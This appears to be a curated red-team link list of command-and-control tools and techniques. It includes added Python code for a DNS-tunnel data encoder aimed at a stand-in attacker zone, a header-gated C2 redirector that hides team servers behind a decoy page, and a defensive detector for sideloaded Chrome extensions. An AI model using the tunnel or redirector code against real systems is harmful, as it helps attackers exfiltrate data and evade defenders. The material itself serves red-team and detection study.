C3
Custom Command and Control (C3). A framework for rapid prototyping of custom C2 channels, while still providing integration with existing offensive toolkits.
https://github.com/FSecureLABS/C3
#c2 #cobaltstrike #redteam
Taking the pain out of C2 Infrastructure
# https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure
# https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4
#c2 #redteam #infrastructure
DNS-Black-Cat
Multi-platform toolkit for an interactive DNS C2 shell: with DNS-Black-Cat you can execute system commands in shell mode over a fully encrypted covert channel.
https://github.com/lawrenceamer/dns-black-cat
#c2 #dns #redteam
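The engineering problem behind any DNS shell is fitting command output into query names: labels are capped at 63 bytes, whole names at 253, and resolvers may randomise label case. The block below is an added example, not DNS-Black-Cat's code: it packs bytes into query names, reassembles them out of order on the authoritative side, and includes the crude detector a blue team would start from. The framing (data labels, then a hex sequence label, then the zone), the zone c2.example.com and the sample output are all constructed for the example.

```python
"""Packing bytes into DNS query names the way a DNS shell such as DNS-Black-Cat
has to, plus the resolver-side unpacking and a crude detector.  Added example,
not the tool's own code: the framing (data labels, then a hex sequence label,
then the zone) and the zone name c2.example.com are this example's own."""
import base64
import math
from typing import Dict, List

MAX_LABEL = 63            # RFC 1035 label limit
MAX_NAME = 253            # practical limit for a textual name
SEQ_LEN = 4               # hex sequence label, so 65 536 queries per message
ZONE = "c2.example.com"   # constructed zone under attacker control


def _b32(data: bytes) -> str:
    # Lowercase, unpadded base32: survives resolvers that randomise label case
    # (0x20 encoding), which would corrupt base64.
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def chunk_size(zone: str) -> int:
    """Bytes per query once the zone, the seq label and the dots are paid for."""
    budget = MAX_NAME - len(zone) - 1 - SEQ_LEN - 1   # chars left for data labels + dots
    labels = budget // (MAX_LABEL + 1)                # full 63-char labels that fit
    return (labels * MAX_LABEL // 8) * 5              # 8 base32 chars carry 5 bytes


def encode(payload: bytes, zone: str = ZONE) -> List[str]:
    """Split payload into query names: <data labels>.<seq>.<zone>."""
    size = chunk_size(zone)
    names = []
    for seq, off in enumerate(range(0, len(payload), size)):
        if seq > 0xFFFF:
            raise ValueError("payload too large for a %d-hex-digit sequence" % SEQ_LEN)
        text = _b32(payload[off:off + size])
        labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
        name = ".".join(labels + [f"{seq:0{SEQ_LEN}x}", zone])
        assert len(name) <= MAX_NAME
        names.append(name)
    return names


def decode(names: List[str], zone: str = ZONE) -> bytes:
    """Reassemble a payload from query names that may arrive out of order."""
    suffix = "." + zone
    chunks: Dict[int, bytes] = {}
    for name in names:
        if not name.lower().endswith(suffix):
            raise ValueError(f"query not in zone {zone}: {name}")
        labels = name[:-len(suffix)].split(".")
        chunks[int(labels[-1], 16)] = _unb32("".join(labels[:-1]))
    if sorted(chunks) != list(range(len(chunks))):
        raise ValueError("missing or duplicate sequence numbers")
    return b"".join(chunks[i] for i in range(len(chunks)))


def label_entropy(label: str) -> float:
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in (label.count(ch) for ch in set(label)))


def looks_like_tunnel(name: str) -> bool:
    """Blue-team heuristic: long or high-entropy labels are rare in real hostnames."""
    return any(len(l) >= 30 or (len(l) >= 16 and label_entropy(l) > 3.5)
               for l in name.split(".") if l)


if __name__ == "__main__":
    output = b"uid=0(root) gid=0(root) groups=0(root)\n"   # constructed command output
    queries = encode(output)
    print(queries[0])
    assert decode(queries) == output
    print("flagged:", looks_like_tunnel(queries[0]), looks_like_tunnel("www.example.com"))
```

With a 14-character zone each query carries 115 bytes, so a page of `ls -la` output costs tens of queries; that volume of long, high-entropy subdomains under one zone is exactly what the heuristic (and any decent DNS analytics) keys on, which is the caveat to keep in mind before relying on DNS as a primary channel rather than a fallback.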
GoWard
GoWard proxies HTTP C2 traffic to specified Red Team servers based on the HTTP header of the traffic.
https://github.com/chdav/GoWard
#c2 #proxy #redteam
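The routing rule GoWard implements is simple to state: a request that carries the agreed header value is forwarded to the matching team server, everything else (scanners, sandboxes, curious analysts) gets a decoy page. The block below is an added illustration of that rule in Python, not GoWard's own code; the header name, the key values, the backend addresses and the decoy are all constructed for the example.

```python
"""Header-gated HTTP redirector: forward only requests that carry an agreed
header value to the matching team server, and answer everything else with a
decoy page.  Added illustration of the routing idea behind GoWard, not GoWard's
own code.  ROUTE_HEADER, ROUTES and the backend addresses are constructed."""
import logging
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Mapping, Optional
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

ROUTE_HEADER = "x-session-key"          # constructed header name
ROUTES = {                               # header value -> team server (constructed)
    "2f9c1e": "http://10.0.0.5:8443",
    "b71a0d": "http://10.0.0.6:8443",
}
DECOY = b"<html><body><h1>It works!</h1></body></html>"
HOP_BY_HOP = {"host", "content-length", "connection", "transfer-encoding"}


def pick_backend(headers: Mapping[str, str]) -> Optional[str]:
    """Return the team server for a request, or None if it should get the decoy.

    Header names are matched case-insensitively, as HTTP requires.  The value
    must match exactly: a scanner sending the header with a guessed value gets
    the decoy just like a request without it."""
    for name, value in headers.items():
        if name.lower() == ROUTE_HEADER:
            return ROUTES.get(value.strip())
    return None


class Redirector(BaseHTTPRequestHandler):
    def _serve_decoy(self) -> None:
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(DECOY)))
        self.end_headers()
        self.wfile.write(DECOY)

    def _handle(self) -> None:
        backend = pick_backend(dict(self.headers.items()))
        if backend is None:
            # Decoy hits are the interesting log: they are the people looking at you.
            logging.info("decoy served to %s for %s", self.client_address[0], self.path)
            self._serve_decoy()
            return
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length) if length else None
        req = Request(backend + self.path, data=body, method=self.command)
        for name, value in self.headers.items():
            if name.lower() not in HOP_BY_HOP:
                req.add_header(name, value)
        try:
            with urlopen(req, timeout=15) as resp:
                self._relay(resp.status, resp.getheaders(), resp.read())
        except HTTPError as err:           # non-2xx from the team server: relay it as-is
            self._relay(err.code, err.headers.items(), err.read())
        except URLError:                   # team server down: still look like a web host
            logging.warning("backend %s unreachable", backend)
            self._serve_decoy()

    def _relay(self, status, headers, body: bytes) -> None:
        self.send_response(status)
        for name, value in headers:
            if name.lower() not in HOP_BY_HOP:
                self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    do_GET = do_POST = do_PUT = do_DELETE = _handle

    def log_message(self, *_) -> None:     # stdlib access log is replaced by the lines above
        pass


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    HTTPServer(("0.0.0.0", 8080), Redirector).serve_forever()
```

Two practical notes: the decoy should be the same content the domain was categorised with, so a reviewer who follows the link sees what the categorisation vendor saw, and the decoy log is worth shipping to the operator, because every hit on it is someone (or some sandbox) inspecting your infrastructure.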
Red Teaming Toolkit
A collection of open source and commercial tools that aid in red team operations. This post will help you during a red team engagement.
Contents
— Reconnaissance
— Weaponization
— Delivery
— Command and Control
— Lateral Movement
— Establish Foothold
— Escalate Privileges
— Data Exfiltration
— Misc
— References
https://renatoborbolla.medium.com/red-teaming-adversary-simulation-toolkit-da89b20cb5ea
#redteam #toolkit #powershell #c2
🦠 Hiding C2 Traffic Using Tyk.io
A short article on hiding malicious C2 traffic behind the domains of the Tyk cloud API management service.
The Tyk API gateway lets you manage API ingress and route requests to different endpoints, some internal and some publicly exposed, and lets you add authentication controls on calls to your APIs.
🔗 https://shells.systems/oh-my-api-abusing-tyk-cloud-api-management-service-to-hide-your-malicious-c2-traffic/
#c2 #redirectors #traffic #redteam
😡 Brute-Ratel-C4-Community-Kit
This repository contains scripts, configurations and deprecated payload loaders for Brute Ratel C4. Anything which is added in the deprecated folder will not be a part of the latest release of BRc4.
https://github.com/paranoidninja/Brute-Ratel-C4-Community-Kit
#c2 #bof #shellcode #injection
⚔️ Maelstrom: C2 Development Blog Series
We wanted to explore how C2s function in 2022, what evasive behaviors are required, and what a minimum viable C2 looks like in a world of sophisticated endpoint protection.
Which gave us our goals for this blog series:
- Document the internals of a minimum viable C2:
* What are the ideas behind popular C2 implementations?
* What are their goals and objectives?
- Analyse and implement evasive behaviors:
* What is required to run on a contemporary Windows system?
* What is required to bypass up-to-date, modern endpoint protection?
- Produce a proof-of-concept C2:
* What is the minimum viable C2 for an operator in 2022?
* What is required to detect this minimum viable C2?
🔗 Maelstrom: An Introduction
🔗 Maelstrom: The C2 Architecture
🔗 Maelstrom: Building the Team Server
🔗 Maelstrom: Writing a C2 Implant
🔗 Maelstrom: EDR Kernel Callbacks, Hooks, and Call Stacks
#maldev #c2
🔴 Reversing BRc4 Red-Teaming Tool Used by APT 29
On May 19, a malicious payload associated with Brute Ratel C4 (BRc4) was uploaded to VirusTotal, where it received a benign verdict from all 56 vendors that evaluated it. Beyond the obvious detection concerns, we believe this sample is also significant in terms of its malicious payload, command and control (C2), and packaging.
Blog post:
https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/
Reversing the Malware by IppSec:
https://youtu.be/a7W6rhkpVSM
#maldev #c2 #brc4
🪲 Abuse Cloudflare Zerotrust for C2 channels
https://0xsp.com/offensive/red-ops-techniques/abuse-cloudflare-zerotrust-for-c2-channels/
#c2 #cloudflare #zerotrust #redteam
🔑 Cobalt Strike Token Vault
This Beacon Object File (BOF) creates in-memory storage for stolen/duplicated Windows access tokens, allowing you to:
— Hot swap/re-use already stolen tokens without re-duplicating them;
— Store tokens for later use in case the user logs out.
https://github.com/Henkru/cs-token-vault
#ad #tokens #c2 #cobalt #redteam
⚔️ Microsoft Teams C2 — Covert Attack Chain Utilizing GIFShell
Seven different insecure design elements/vulnerabilities present in Microsoft Teams can be leveraged by an attacker to execute a reverse shell between an attacker and victim, where no communication is directly exchanged between attacker and victim but is entirely piped through malicious GIFs sent in Teams messages and Out of Bounds (OOB) lookups of GIFs conducted by Microsoft’s own servers. This unique C2 infrastructure can be leveraged by sophisticated threat actors to avoid detection by EDR and other network monitoring tools. Particularly in secure network environments, where Microsoft Teams might be one of a handful of allowed, trusted hosts and programs, this attack chain can be particularly devastating.
Source:
https://medium.com/@bobbyrsec/gifshell-covert-attack-chain-and-c2-utilizing-microsoft-teams-gifs-1618c4e64ed7
#c2 #teams #gifshell #edr #redteam
😴 Creating Object File Monstrosities with Sleep Mask and LLVM
The Mutator kit is now part of the Cobalt Strike Arsenal Kit. It allows you to mutate BOFs, sleep masks and more with LLVM.
Read about it on the blog:
🔗 https://www.cobaltstrike.com/blog/introducing-the-mutator-kit-creating-object-file-monstrosities-with-sleep-mask-and-llvm
#c2 #sleepmask #llvm #redteam
azureOutlookC2
Azure Outlook Command & Control (C2) - Remotely control a compromised Windows Device from your Outlook mailbox. Threat Emulation Tool for North Korean APT InkySquid / ScarCruft / APT37. TTP...
https://github.com/boku7/azureOutlookC2
BOFHound
This is an offline BloodHound ingestor and LDAP result parser. BOFHound allows operators to use BloodHound's beloved interface while keeping full control over the LDAP queries being run and the speed at which they are executed. This leaves room for operator discretion to account for potential honeypot accounts, expensive LDAP query thresholds and other detection mechanisms designed with the traditional, automated BloodHound collectors in mind.
Tools:
🔗 https://github.com/coffeegist/bofhound
Research:
🔗 https://posts.specterops.io/bofhound-session-integration-7b88b6f18423
#c2 #bof #cobaltstrike #redteam
How to silently install any Chrome extension and avoid common indicators of compromise (IOCs). The method avoids CLI parameters and registry edits, and persists via the Secure Preferences file.
🔗 Source:
https://syntax-err0r.github.io/Silently_Install_Chrome_Extension.html
#chrome #persistence #maldev #c2
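Because the technique leaves no command-line flag and no registry value, the place to hunt for it is the Secure Preferences file itself. The block below is an added detection example, not code from the linked article: it reads a profile's Secure Preferences and reports extensions that do not look like a plain Web Store install. The sample file is constructed; the field names (extensions.settings.<id>.from_webstore, location, path, state, manifest.name and protection.macs) and the meaning of the location values are this author's reading of Chromium and are assumptions to confirm against a known-good profile before relying on them.

```python
"""Hunt for Chrome extensions that did not come from the Web Store by reading a
profile's Secure Preferences file, the file the technique above writes to.
Added detection example, not code from the linked article.  The sample below is
constructed; the field names and the location enum values are assumptions
(the author's reading of Chromium) and should be confirmed on a clean profile."""
import json
from pathlib import Path, PurePosixPath, PureWindowsPath
from typing import Dict, List

LOCATION_INTERNAL = 1      # normal user install from the Web Store (assumed enum value)
LOCATION_COMPONENT = 5     # Chrome's own bundled extensions (assumed enum value)

# Constructed Secure Preferences: one Web Store extension and one sideloaded one.
SAMPLE_SECURE_PREFS = json.dumps({
    "extensions": {"settings": {
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": {
            "from_webstore": True, "location": LOCATION_INTERNAL, "state": 1,
            "path": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\1.2.3_0",
            "manifest": {"name": "Legit Password Manager", "version": "1.2.3"},
        },
        "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": {
            "from_webstore": False, "location": 4, "state": 1,
            "path": "C:\\Users\\victim\\AppData\\Local\\Temp\\ext",
            "manifest": {"name": "Totally Normal Helper", "version": "0.1"},
        },
    }},
    "protection": {"macs": {"extensions": {"settings": {
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": "9A3F...",   # per-entry HMAC, truncated
    }}}},
})


def _is_absolute(path: str) -> bool:
    # Profiles are read on whatever OS the analyst uses, so accept both path styles.
    return PureWindowsPath(path).is_absolute() or PurePosixPath(path).is_absolute()


def suspicious_extensions(secure_prefs_text: str) -> List[Dict[str, object]]:
    """Return extensions with any sign of not being a plain Web Store install."""
    prefs = json.loads(secure_prefs_text)
    settings = prefs.get("extensions", {}).get("settings", {})
    macs = (prefs.get("protection", {}).get("macs", {})
                 .get("extensions", {}).get("settings", {}))
    hits = []
    for ext_id, meta in settings.items():
        if meta.get("location") == LOCATION_COMPONENT:
            continue
        reasons = []
        if not meta.get("from_webstore", False):
            reasons.append("from_webstore is false or absent")
        if meta.get("location") != LOCATION_INTERNAL:
            reasons.append(f"location={meta.get('location')} (not a user install)")
        if _is_absolute(str(meta.get("path", ""))):
            reasons.append("absolute path outside the profile's Extensions directory")
        if ext_id not in macs:
            reasons.append("no protection MAC recorded for this entry")
        if reasons:
            hits.append({"id": ext_id,
                         "name": meta.get("manifest", {}).get("name", "?"),
                         "enabled": meta.get("state") == 1,
                         "reasons": reasons})
    return hits


def scan_user_data_dir(user_data_dir: Path) -> Dict[str, List[Dict[str, object]]]:
    """Walk every profile under a Chrome user-data directory
    (e.g. %LOCALAPPDATA%\\Google\\Chrome\\User Data on Windows)."""
    return {p.parent.name: suspicious_extensions(p.read_text(encoding="utf-8"))
            for p in user_data_dir.glob("*/Secure Preferences")}


if __name__ == "__main__":
    for hit in suspicious_extensions(SAMPLE_SECURE_PREFS):
        print(hit["id"], hit["name"], "enabled" if hit["enabled"] else "disabled")
        for reason in hit["reasons"]:
            print("   -", reason)
```

The "no protection MAC" check is the weakest of the four: an attacker who writes the file can also recompute the per-entry HMAC, which is presumably what makes the technique silent. Treat the other three signals as the primary ones and baseline them against a clean install, since enterprise-deployed extensions legitimately show non-webstore locations.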